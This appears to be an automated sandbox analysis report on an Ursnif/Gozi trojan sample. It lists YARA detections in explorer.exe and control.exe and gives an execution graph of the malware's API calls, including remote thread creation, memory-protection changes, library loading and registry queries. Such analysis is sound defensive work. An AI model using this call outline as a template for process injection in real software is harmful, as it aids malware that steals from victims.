                                      Target ID:11
                                      Start time:09:31:18
                                      Start date:13/10/2022
                                      Path:C:\Windows\explorer.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\Explorer.EXE
                                      Imagebase:0x7ff69bc80000
                                      File size:3933184 bytes
                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000000B.00000002.740959208.00000000125FC000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 0000000B.00000002.740959208.00000000125FC000.00000004.00000001.00020000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000000B.00000002.738730438.000000000DCBC000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 0000000B.00000002.738730438.000000000DCBC000.00000004.00000001.00020000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000000B.00000000.714710213.000000000DCBC000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 0000000B.00000000.714710213.000000000DCBC000.00000004.00000001.00020000.00000000.sdmp, Author: unknown

                                      General

                                      Target ID:12
                                      Start time:09:31:20
                                      Start date:13/10/2022
                                      Path:C:\Windows\System32\control.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\control.exe -h
                                      Imagebase:0x7ff7f7f70000
                                      File size:117760 bytes
                                      MD5 hash:625DAC87CB5D7D44C5CA1DA57898065F
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000000C.00000003.684854059.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 0000000C.00000003.684854059.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000000C.00000000.681883913.0000000000480000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000000C.00000003.684949617.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 0000000C.00000003.684949617.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000000C.00000002.724699237.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 0000000C.00000002.724699237.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000000C.00000000.680871269.0000000000480000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000000C.00000000.684080193.0000000000480000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security

                                      Disassembly

                                      Reset < >

                                        Executed Functions

                                        Function 00000212A46D0FC1 Relevance: .0, Instructions: 5COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000003.630100383.00000212A46D0000.00000010.00000800.00020000.00000000.sdmp, Offset: 00000212A46D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_3_212a46d0000_mshta.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                        • Instruction ID: 7a53f4b7a879c98e029cb894b1bb45510ceb3ad59910d87bd1414a281d37dc80
                                        • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                        • Instruction Fuzzy Hash: 0D900214495946D9D41811920C4929C5040A7D8554FE884809C1690144D54D42AA1162
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00000212A46D0FB9 Relevance: .0, Instructions: 5COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000003.630100383.00000212A46D0000.00000010.00000800.00020000.00000000.sdmp, Offset: 00000212A46D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_3_212a46d0000_mshta.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                        • Instruction ID: 7a53f4b7a879c98e029cb894b1bb45510ceb3ad59910d87bd1414a281d37dc80
                                        • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                        • Instruction Fuzzy Hash: 0D900214495946D9D41811920C4929C5040A7D8554FE884809C1690144D54D42AA1162
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Execution Graph

                                        Execution Coverage:3.9%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:20.8%
                                        Total number of Nodes:477
                                        Total number of Limit Nodes:37
                                        execution_graph 14754 4a3140 14755 4a3167 14754->14755 14758 4a31bb 14754->14758 14756 4a31ad 14755->14756 14755->14758 14759 4a31db 14755->14759 14757 49342c 4 API calls 14756->14757 14757->14758 14759->14758 14760 49342c 4 API calls 14759->14760 14760->14758 14472 4a3e45 14473 4a3e5d 14472->14473 14475 4a3e7f 14472->14475 14476 48c868 14473->14476 14477 48c8a8 14476->14477 14481 48c8b0 14477->14481 14482 4a7c24 14477->14482 14479 48c995 14480 4a7c24 3 API calls 14479->14480 14479->14481 14480->14481 14481->14475 14483 4a7c4c 14482->14483 14484 4a7c88 14483->14484 14486 4a62bc 14483->14486 14484->14479 14487 4a62ee 14486->14487 14492 492904 14487->14492 14489 4a65f9 14489->14484 14490 4a6472 14490->14489 14496 4a8554 14490->14496 14493 492922 14492->14493 14495 492927 14492->14495 14494 4a8554 3 API calls 14493->14494 14494->14495 14495->14490 14497 4a857f 14496->14497 14498 497ca8 3 API calls 14497->14498 14499 4a85a5 14498->14499 14500 4a85db 14499->14500 14502 49d6a0 14499->14502 14500->14489 14503 49d6b9 14502->14503 14505 49d6df 14503->14505 14506 486a60 14503->14506 14505->14500 14507 482e84 2 API calls 14506->14507 14508 486a93 14507->14508 14508->14505 14186 4bd158 14187 4bd0a2 14186->14187 14188 4bd31c 14187->14188 14189 4bd237 NtProtectVirtualMemory 14187->14189 14189->14188 14190 4bd288 14189->14190 14190->14188 14191 4bd2d0 NtProtectVirtualMemory 14190->14191 14191->14188 14191->14190 14781 49cf64 14782 49cf7b 14781->14782 14783 497ca8 3 API calls 14782->14783 14789 49cfc1 14782->14789 14784 49cf84 14783->14784 14785 485b28 4 API calls 14784->14785 14786 49cf8e 14785->14786 14787 49cf9c 14786->14787 14788 49887c 4 API calls 14786->14788 14787->14789 14790 4a5b38 4 API calls 14787->14790 14788->14787 14790->14789 14795 4a5378 14796 4a53b4 14795->14796 14797 4a545a 14795->14797 14796->14797 14798 49879c 2 API calls 14796->14798 14799 4a5445 14798->14799 14800 4a66fc 5 API calls 14799->14800 14800->14797 14523 4ac672 14524 4ac67e 14523->14524 14525 4ac89c LoadLibraryA 14524->14525 14526 4ac6bd 14525->14526 14527 4a4473 14528 4a447f 14527->14528 14530 4a448d 14528->14530 14531 4a0628 14528->14531 14534 4a0646 14531->14534 14532 4a06be 14532->14530 14533 49879c 2 API calls 14533->14532 14534->14532 14534->14533 14535 4a1a70 14536 4a1ba8 14535->14536 14537 4a1aa6 14535->14537 14537->14536 14539 4a33f4 14537->14539 14540 4a3458 14539->14540 14541 492904 3 API calls 14540->14541 14542 4a3790 14540->14542 14543 4a351b 14541->14543 14542->14536 14543->14542 14544 4a8554 3 API calls 14543->14544 14544->14542 14809 484508 14810 484551 14809->14810 14811 4845c7 14810->14811 14812 49e674 FindCloseChangeNotification 14810->14812 14812->14811 14813 495108 14814 482e84 2 API calls 14813->14814 14815 49513c 14814->14815 14816 49e334 2 API calls 14815->14816 14817 49515d 14815->14817 14816->14817 14818 4a62bc 3 API calls 14817->14818 14820 49526e 14817->14820 14818->14820 14819 49543b 14820->14819 14821 49879c 2 API calls 14820->14821 14823 49534b 14821->14823 14823->14819 14824 482178 14823->14824 14825 482606 14824->14825 14828 4821c6 14824->14828 14826 4828c8 14825->14826 14827 482a07 14825->14827 14846 482226 14825->14846 14833 4a7c24 3 API calls 14826->14833 14826->14846 14832 49d6a0 2 API calls 14827->14832 14827->14846 14829 4821ec 14828->14829 14830 4822f7 14828->14830 14838 4821f2 14828->14838 14828->14846 14831 4822c9 14829->14831 14829->14838 14836 48237d 14830->14836 14837 482317 14830->14837 14830->14846 14835 48c868 3 API calls 14831->14835 14831->14846 14834 482aba 14832->14834 14833->14846 14839 486748 4 API calls 14834->14839 14834->14846 14835->14846 14843 4ab608 6 API calls 14836->14843 14836->14846 14837->14846 14847 4830ac 14837->14847 14840 48223a 14838->14840 14844 4824a3 14838->14844 14838->14846 14839->14846 14841 49d6a0 2 API calls 14840->14841 14840->14846 14841->14846 14843->14846 14844->14846 14851 49bbf4 14844->14851 14846->14823 14849 4830e9 14847->14849 14848 483162 14848->14846 14849->14848 14850 4a33f4 3 API calls 14849->14850 14850->14848 14853 49bc14 14851->14853 14852 49bca4 14852->14846 14853->14852 14854 49c73c 3 API calls 14853->14854 14854->14852 14552 4bd002 14557 4bd007 14552->14557 14553 4bd237 NtProtectVirtualMemory 14554 4bd31c 14553->14554 14555 4bd288 14553->14555 14555->14554 14556 4bd2d0 NtProtectVirtualMemory 14555->14556 14556->14554 14556->14555 14557->14553 14557->14554 14557->14557 14859 4ac703 14860 4ac70f 14859->14860 14861 4ac89c LoadLibraryA 14860->14861 14861->14860 14562 4ac800 14563 4ac70f 14562->14563 14563->14562 14564 4ac89c LoadLibraryA 14563->14564 14564->14563 14569 48de10 14570 48de38 14569->14570 14571 48df08 14570->14571 14573 49e674 14570->14573 14574 49e68b 14573->14574 14575 49e68f 14574->14575 14576 4864f4 FindCloseChangeNotification 14574->14576 14575->14571 14576->14575 14581 49703c 14582 497077 14581->14582 14583 49704d 14581->14583 14583->14582 14585 4a564c 14583->14585 14587 4a5678 14585->14587 14586 4a5802 14586->14582 14587->14586 14589 4aaeb8 14587->14589 14591 4aaef2 14589->14591 14590 4aaffc 14590->14586 14591->14590 14592 4a33f4 3 API calls 14591->14592 14592->14590 14983 4a3deb 14984 4a3e06 14983->14984 14985 4a3e2d 14984->14985 14986 48c868 3 API calls 14984->14986 14986->14985 14633 4a3ee9 14634 48c868 3 API calls 14633->14634 14635 4a3f17 14634->14635 14636 4866ec 14637 486723 14636->14637 14638 4866fa 14636->14638 14638->14637 14640 487c30 14638->14640 14641 487c7d 14640->14641 14642 487c43 14640->14642 14641->14637 14643 4a33f4 3 API calls 14642->14643 14643->14641 14994 4929ec 14995 492a26 14994->14995 14996 49879c 2 API calls 14995->14996 14997 492bbc 14995->14997 14996->14997 14644 4a2cec 14646 4a2d41 14644->14646 14645 4a1298 5 API calls 14647 4a2ed7 14645->14647 14646->14645 14646->14647 14998 4a5bec 14999 4a5c35 14998->14999 15000 49e674 FindCloseChangeNotification 14999->15000 15001 4a5cab 14999->15001 15000->15001 14652 4a8ae0 14653 4a8b12 14652->14653 14657 4a8bf9 14653->14657 14662 486748 14653->14662 14656 486748 4 API calls 14658 4a8b96 14656->14658 14658->14657 14659 486748 4 API calls 14658->14659 14660 4a8bca 14659->14660 14660->14657 14661 486748 4 API calls 14660->14661 14661->14657 14664 48677c 14662->14664 14663 48688b 14663->14656 14663->14657 14664->14663 14666 482e84 2 API calls 14664->14666 14669 486806 14664->14669 14667 4867eb 14666->14667 14668 49e334 2 API calls 14667->14668 14667->14669 14668->14669 14669->14663 14670 483a00 14669->14670 14671 483a23 14670->14671 14672 483a50 14671->14672 14673 49879c 2 API calls 14671->14673 14672->14663 14673->14672 15002 4a43e4 15003 4a43f4 15002->15003 15005 4a441f 15002->15005 15004 49879c 2 API calls 15003->15004 15003->15005 15004->15005 15009 4a49fc 15011 4a4a33 15009->15011 15010 4a4bb4 15011->15010 15012 487c30 RegCreateKeyA RegOpenKeyA RegQueryValueExA 15011->15012 15012->15011 15013 4833f4 15014 485e14 2 API calls 15013->15014 15015 483439 15014->15015 14686 4ac6f7 14687 4ac67e 14686->14687 14688 4ac89c LoadLibraryA 14687->14688 14689 4ac6bd 14688->14689 14689->14689 14690 49008c 14691 4900b7 14690->14691 14693 490143 14690->14693 14692 49342c 4 API calls 14691->14692 14691->14693 14692->14693 14192 4ac89c 14193 4ac940 14192->14193 14195 4ac91b 14192->14195 14194 4ac9d4 LoadLibraryA 14193->14194 14193->14195 14194->14195 15042 495f90 15043 495fc2 15042->15043 15044 49601f 15043->15044 15045 4a9d54 9 API calls 15043->15045 15045->15044 14714 4a3e97 14715 4a3eaf 14714->14715 14716 4a3ed1 14714->14716 14717 48c868 3 API calls 14715->14717 14717->14716 15049 4a41aa 15050 4a41af 15049->15050 15052 4a41c1 15049->15052 15051 49879c 2 API calls 15050->15051 15051->15052 15053 49d6a0 2 API calls 15052->15053 15054 4a422d 15053->15054 15055 4a426f 15054->15055 15056 49879c 2 API calls 15054->15056 15056->15055 14196 48ada0 14197 48adaf 14196->14197 14198 48adcb 14196->14198 14197->14198 14200 49d6f0 14197->14200 14201 49d728 HeapCreate 14200->14201 14203 49d75c 14201->14203 14206 49d764 14201->14206 14203->14198 14206->14203 14208 495700 14206->14208 14210 495725 14208->14210 14209 4957b2 14212 49c35c 14209->14212 14210->14209 14211 4957a9 FindCloseChangeNotification 14210->14211 14211->14209 14213 49c3ac 14212->14213 14214 49c3c9 StrRChrA 14213->14214 14215 49c3dd 14213->14215 14214->14215 14224 49e6c4 14215->14224 14218 49c4d8 14218->14203 14220 49c4ad 14220->14218 14221 49c4ba RtlAddVectoredContinueHandler 14220->14221 14222 49c4d0 14220->14222 14221->14222 14236 4963e0 14222->14236 14225 49e6e1 14224->14225 14226 49c442 14225->14226 14227 49e75a NtQueryInformationToken 14225->14227 14226->14218 14232 49039c 14226->14232 14228 49e795 14227->14228 14229 49e79d NtQueryInformationToken 14228->14229 14230 49e7f0 NtClose 14228->14230 14231 49e7ca 14229->14231 14230->14226 14231->14230 14233 4903da 14232->14233 14235 490401 14233->14235 14263 49d054 14233->14263 14235->14220 14237 496417 14236->14237 14238 4964a1 CreateMutexExA 14237->14238 14262 4964d3 14237->14262 14239 4964c0 14238->14239 14240 4966dc GetUserNameA 14239->14240 14239->14262 14241 4966f9 14240->14241 14247 4968d5 14241->14247 14241->14262 14269 4ab608 14241->14269 14245 4969ba 14281 497ca8 14245->14281 14246 496970 14246->14245 14308 49887c 14246->14308 14247->14262 14276 485b28 14247->14276 14249 4969d1 14288 4aa2cc 14249->14288 14251 496a44 14252 496dcd 14251->14252 14260 496b0a 14251->14260 14251->14262 14252->14262 14325 482e84 14252->14325 14254 496dfb 14259 496e21 14254->14259 14329 49e334 RegQueryValueExA 14254->14329 14256 482e84 2 API calls 14257 496ebf 14256->14257 14258 49e334 2 API calls 14257->14258 14257->14262 14258->14262 14259->14256 14260->14262 14320 4a1298 14260->14320 14262->14218 14267 49d09b 14263->14267 14264 49d23d 14264->14235 14266 49d1b4 lstrcmp 14266->14267 14267->14264 14267->14266 14268 49d20b RtlDeleteBoundaryDescriptor 14267->14268 14268->14264 14270 4ab62f 14269->14270 14332 48e7f8 14270->14332 14272 4ab756 14272->14247 14273 4ab740 RtlDeleteBoundaryDescriptor 14273->14272 14274 4ab6a2 14274->14272 14274->14273 14275 48e7f8 5 API calls 14274->14275 14275->14274 14277 482e84 2 API calls 14276->14277 14278 485b55 14277->14278 14279 49e334 2 API calls 14278->14279 14280 485b72 14278->14280 14279->14280 14280->14246 14282 482e84 2 API calls 14281->14282 14283 497ce4 14282->14283 14284 497cf5 RegQueryValueExA 14283->14284 14285 497d28 14283->14285 14284->14285 14287 497db6 14285->14287 14366 49879c 14285->14366 14287->14249 14289 4aa2ee 14288->14289 14290 4aa384 14288->14290 14293 4aa37a 14289->14293 14294 4aa2fb 14289->14294 14306 4aa36e 14289->14306 14291 4aa38f 14290->14291 14292 4aa453 14290->14292 14297 4aa31f 14291->14297 14298 4aa3a1 14291->14298 14304 4aa42c 14291->14304 14389 4a0b90 14292->14389 14376 4a7de0 14293->14376 14294->14292 14300 4aa367 14294->14300 14301 4aa314 14294->14301 14294->14306 14369 4a9d54 14297->14369 14298->14300 14298->14304 14299 4aa362 14299->14306 14397 4a5b38 14299->14397 14300->14306 14380 492424 14300->14380 14301->14297 14301->14300 14305 492424 10 API calls 14304->14305 14304->14306 14305->14306 14306->14251 14309 49889e 14308->14309 14310 498c98 14309->14310 14312 482e84 2 API calls 14309->14312 14319 498ced 14309->14319 14311 482e84 2 API calls 14310->14311 14314 498ccc 14311->14314 14313 498c6b 14312->14313 14315 498c8c 14313->14315 14316 49e334 2 API calls 14313->14316 14318 49e334 2 API calls 14314->14318 14314->14319 14315->14310 14468 48cda8 14315->14468 14316->14315 14318->14319 14319->14245 14321 48e7f8 5 API calls 14320->14321 14323 4a12c8 14321->14323 14322 4a1327 14322->14262 14323->14322 14324 48e7f8 5 API calls 14323->14324 14324->14323 14326 482eb4 RegOpenKeyA 14325->14326 14327 482ea7 RegCreateKeyA 14325->14327 14328 482ebf 14326->14328 14327->14328 14328->14254 14330 49e3dc RegCloseKey 14329->14330 14331 49e37e 14329->14331 14330->14259 14331->14330 14333 48e823 14332->14333 14338 48e82b 14332->14338 14345 494e14 NtQueryInformationProcess 14333->14345 14335 48e932 14335->14274 14338->14335 14339 48a280 14338->14339 14347 48fb94 14338->14347 14340 48a2bd 14339->14340 14343 48a2d6 14340->14343 14360 4aae0c VirtualProtect 14340->14360 14343->14338 14344 48a39d VirtualProtect 14344->14343 14346 494e44 14345->14346 14346->14338 14348 48fbd1 14347->14348 14349 4aae0c VirtualProtect 14348->14349 14351 48fd4e 14348->14351 14350 48fbf9 14349->14350 14350->14351 14362 48e1b0 14350->14362 14351->14338 14353 48fcbb VirtualProtect 14354 48fcec 14353->14354 14358 494e14 NtQueryInformationProcess 14354->14358 14355 48fc29 14355->14351 14355->14353 14356 4aae0c VirtualProtect 14355->14356 14357 48fc73 14356->14357 14357->14353 14359 48fc77 VirtualProtect 14357->14359 14358->14351 14359->14353 14361 48a382 14360->14361 14361->14343 14361->14344 14363 48e1e4 14362->14363 14365 48e282 14362->14365 14364 48fb94 4 API calls 14363->14364 14363->14365 14364->14365 14365->14355 14367 482e84 2 API calls 14366->14367 14368 4987d6 14367->14368 14368->14287 14370 4a9d67 14369->14370 14371 4a9dcb 14370->14371 14372 4a9d84 14370->14372 14373 4a9dc9 14371->14373 14404 4935c8 14371->14404 14374 4a1298 5 API calls 14372->14374 14373->14299 14374->14373 14377 4a7e22 14376->14377 14378 4a1298 5 API calls 14377->14378 14379 4a7e4a 14377->14379 14378->14379 14379->14299 14416 484b64 14380->14416 14382 492440 14383 484b64 5 API calls 14382->14383 14386 492463 14382->14386 14383->14386 14384 4924fc SleepEx 14387 492510 14384->14387 14385 492545 14385->14306 14386->14384 14386->14385 14386->14387 14387->14385 14422 49342c 14387->14422 14390 4a0bbd 14389->14390 14390->14390 14394 4a0d30 14390->14394 14457 4acb8c 14390->14457 14393 48e7f8 5 API calls 14395 4a0cb9 14393->14395 14394->14299 14395->14394 14396 48e7f8 5 API calls 14395->14396 14396->14395 14398 482e84 2 API calls 14397->14398 14399 4a5b5c 14398->14399 14400 49e334 2 API calls 14399->14400 14403 4a5b77 14399->14403 14400->14403 14402 4a5be3 14402->14306 14465 485e14 14403->14465 14409 4935f8 14404->14409 14405 4937b1 14405->14373 14406 482e84 2 API calls 14407 4936e4 14406->14407 14408 493705 14407->14408 14410 49e334 2 API calls 14407->14410 14408->14405 14412 4a66fc 14408->14412 14409->14405 14409->14406 14410->14408 14414 4a671c 14412->14414 14413 4a6875 14413->14405 14414->14413 14415 48e7f8 5 API calls 14414->14415 14415->14413 14417 484b7e 14416->14417 14434 4a0150 14417->14434 14420 484baa 14420->14382 14421 4a0150 5 API calls 14421->14420 14423 493465 14422->14423 14424 495700 FindCloseChangeNotification 14423->14424 14433 49347a 14423->14433 14425 493491 14424->14425 14426 4934a4 NtSetInformationProcess 14425->14426 14428 4934d5 14425->14428 14425->14433 14427 4934cd 14426->14427 14426->14428 14448 4a0a50 NtQueryInformationProcess 14427->14448 14428->14433 14449 4ab778 14428->14449 14431 493540 14431->14433 14453 4864f4 14431->14453 14433->14385 14435 4a018f 14434->14435 14436 4a019b RegOpenKeyExA 14435->14436 14440 484b92 14435->14440 14437 4a01be 14436->14437 14437->14440 14444 4a6934 RegQueryValueExA 14437->14444 14440->14420 14440->14421 14441 4a0232 RegCloseKey 14441->14440 14442 4a6934 3 API calls 14443 4a022d 14442->14443 14443->14441 14445 4a698d RtlAllocateHeap 14444->14445 14447 4a020b 14444->14447 14446 4a69de RegQueryValueExA 14445->14446 14445->14447 14446->14447 14447->14441 14447->14442 14448->14428 14450 4ab7de CreateRemoteThread 14449->14450 14451 4ab7ac 14449->14451 14452 4ab7d4 14450->14452 14451->14450 14451->14452 14452->14431 14454 486536 14453->14454 14455 495700 FindCloseChangeNotification 14454->14455 14456 486554 14455->14456 14456->14433 14458 4a0c9a 14457->14458 14459 4acbc1 14457->14459 14458->14393 14459->14458 14461 4ac89c 14459->14461 14462 4ac940 14461->14462 14464 4ac91b 14461->14464 14463 4ac9d4 LoadLibraryA 14462->14463 14462->14464 14463->14464 14464->14459 14466 482e84 2 API calls 14465->14466 14467 485e53 14466->14467 14467->14402 14469 48cf16 14468->14469 14471 48cddd 14468->14471 14470 49879c 2 API calls 14469->14470 14470->14471 14471->14310 14722 49dcb4 14723 49dcf2 14722->14723 14724 49dd30 14723->14724 14725 4a62bc 3 API calls 14723->14725 14726 49dd62 14724->14726 14728 49c73c 14724->14728 14725->14724 14729 49c767 14728->14729 14730 49c855 14729->14730 14733 49c771 14729->14733 14732 4a8554 3 API calls 14730->14732 14731 49c823 14731->14726 14732->14731 14733->14731 14735 49dee4 14733->14735 14736 482e84 2 API calls 14735->14736 14737 49df19 14736->14737 14737->14731

                                        Executed Functions

                                        Function 0049E6C4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 113nativeCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.722923108.0000000000481000.00000020.80000000.00040000.00000000.sdmp, Offset: 00481000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_481000_control.jbxd
                                        Similarity
                                        • API ID: InformationQueryToken$Close
                                        • String ID: 0
                                        • API String ID: 459398573-4108050209
                                        • Opcode ID: 13bb166f2edcac1c63535b73b73ac0494bee6c2390724b3bdfaeb3c95e5c4449
                                        • Instruction ID: d422d1966cd1af43199ec8916fbc912da10811257527e8d722cd403bca2a6fba
                                        • Opcode Fuzzy Hash: 13bb166f2edcac1c63535b73b73ac0494bee6c2390724b3bdfaeb3c95e5c4449
                                        • Instruction Fuzzy Hash: 50310B306187498FD764EF59D8C5BAAB7E2FBD8311F50493EE88AC3214DB349945CB42
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004963E0 Relevance: 4.1, APIs: 2, Instructions: 1081synchronizationCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 48 4963e0-49645f 51 496461-496493 call 48fde4 48->51 52 496495-496496 48->52 54 496498-49649b 51->54 52->54 56 49701e-49703a 54->56 57 4964a1-4964ca CreateMutexExA 54->57 60 4964e8-4964eb 57->60 61 4964cc-4964d1 57->61 64 49701b-49701c 60->64 65 4964f1-496518 60->65 62 4964d3-4964e0 61->62 63 4964e5-4964e6 61->63 62->64 63->60 64->56 68 4965df-4965e0 65->68 69 49651e-49656a 65->69 70 4965e2-4965e5 68->70 82 49656c-496573 69->82 83 496581-496591 69->83 70->56 71 4965eb-49662c 70->71 75 4966d0-4966d1 71->75 76 496632-496638 71->76 80 4966d3-4966d6 75->80 77 49663a-496648 76->77 78 4966a6-4966ce call 4a687c 76->78 81 49664a-496692 77->81 78->80 80->56 85 4966dc-4966f7 GetUserNameA 80->85 86 49669e-4966a4 81->86 87 496694-496698 81->87 82->83 88 496575-49657b call 49f128 82->88 89 496597-4965c0 83->89 91 4966f9-496715 85->91 92 496728-49673a 85->92 86->78 86->81 87->86 88->83 101 4965c2-4965dd 89->101 91->92 102 496717-496720 91->102 93 49673c-496741 92->93 94 496743-49678c 92->94 93->94 96 4967ae-4967b3 93->96 110 49679f-4967a0 94->110 111 49678e-496797 94->111 103 4967f5-4967f8 96->103 104 4967b5-4967d6 96->104 101->70 102->92 105 4967fa-49680a call 4a1c0e 103->105 106 49680f-496846 103->106 116 4967d8-4967df 104->116 117 4967ea-4967f2 104->117 105->106 114 496848-496868 106->114 115 4968bd 106->115 120 4967a8 110->120 122 49679d 111->122 123 4968e0-4968ec 111->123 130 49686e-496892 call 487c90 114->130 119 4968c2-4968c5 115->119 116->117 121 4967e1-4967e8 116->121 117->103 119->56 124 4968cb-4968ce 119->124 120->96 121->103 122->120 126 4968ee-49691f call 493e2c 123->126 127 496966-496978 call 485b28 123->127 128 4968d0 call 4ab608 124->128 129 4968d7-4968da 124->129 126->127 141 496921-496929 126->141 142 49697a-4969ab call 493e2c 127->142 143 4969b2-4969c4 call 49887c 127->143 138 4968d5 128->138 129->56 129->123 139 496899-49689f 130->139 140 496894-496897 130->140 138->129 145 4968af 139->145 146 4968a1-4968ab 139->146 140->139 141->127 147 49692b-496960 call 4926cc 141->147 154 4969ad-4969ae 142->154 155 4969cc-496a13 call 497ca8 call 4a1860 142->155 143->155 151 4968b4-4968bb 145->151 146->130 150 4968ad 146->150 147->127 150->151 151->119 154->143 162 496a3c-496a3f call 4aa2cc 155->162 163 496a15-496a34 155->163 166 496a44-496a49 162->166 163->162 166->56 167 496a4f-496a68 166->167 167->56 169 496a6e-496a96 167->169 171 496a98-496aad 169->171 172 496abc-496ae6 call 48ac68 169->172 171->172 176 496aaf-496ab7 171->176 177 496ae8-496af0 172->177 178 496af5-496b04 172->178 176->56 177->56 179 496b0a-496b40 call 4a687c 178->179 180 496dcd-496dd4 178->180 198 496b4d-496b50 179->198 199 496b42-496b49 179->199 182 496dda-496dfe call 482e84 180->182 183 496f5c-496f65 180->183 195 496ea1-496ec2 call 482e84 182->195 196 496e04-496e24 call 49e334 182->196 183->64 184 496f6b-496f70 183->184 187 496fe2-497010 call 48ac68 184->187 188 496f72-496f75 184->188 187->177 207 497016-497018 187->207 191 496f87-496fa4 188->191 192 496f77-496f81 188->192 191->187 211 496fa6-496fd8 191->211 192->191 195->183 208 496ec8-496ee5 call 49e334 195->208 196->195 209 496e26-496e33 196->209 198->56 205 496b56-496c23 call 49d64c * 4 198->205 199->198 233 496c91-496c94 205->233 234 496c25-496c2c 205->234 207->64 208->183 218 496ee7-496ef4 208->218 213 496e8f-496e99 209->213 214 496e35-496e7a call 4a83c4 call 4aa09c 209->214 211->187 213->195 214->213 236 496e7c-496e8a call 48bc1c 214->236 221 496f4a-496f54 218->221 222 496ef6-496f3c call 4a83c4 call 4aa09c 218->222 221->183 222->221 245 496f3e-496f45 call 4abdcc 222->245 233->56 237 496c9a-496ca1 233->237 234->233 238 496c2e-496c49 234->238 236->213 241 496cb8-496cd7 237->241 242 496ca3-496cb2 237->242 247 496c4b-496c51 238->247 248 496c53-496c7f call 48ac68 238->248 250 496cd9-496d12 call 4a1298 241->250 251 496d17-496d57 241->251 242->241 245->221 256 496c8f 247->256 248->233 258 496c81-496c87 248->258 250->251 259 496d59-496d76 call 48ac68 251->259 260 496d9a-496da0 251->260 256->233 258->256 266 496d78-496d7d 259->266 267 496d7f-496d98 259->267 265 496da2-496da5 260->265 265->56 268 496dab-496db6 265->268 266->265 267->265 268->183 270 496dbc-496dc8 call 489338 268->270 270->183
                                        APIs
                                        • CreateMutexExA.KERNEL32(-00000001,0049D986), ref: 004964AD
                                        • GetUserNameA.ADVAPI32 ref: 004966E6
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.722923108.0000000000481000.00000020.80000000.00040000.00000000.sdmp, Offset: 00481000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_481000_control.jbxd
                                        Similarity
                                        • API ID: CreateMutexNameUser
                                        • String ID:
                                        • API String ID: 3764123871-0
                                        • Opcode ID: 5c9796a6900e177ec60b050334b91349d620bc42450a5b038705803160e6450c
                                        • Instruction ID: 28e0794307dea01af43592522badecc597dcf66e2112b43f271315e423575877
                                        • Opcode Fuzzy Hash: 5c9796a6900e177ec60b050334b91349d620bc42450a5b038705803160e6450c
                                        • Instruction Fuzzy Hash: 2A72A570618A158FEB19EF28EC855BA77E1F798710711853ED48BC3261DE3CE942CB86
                                        Uniqueness

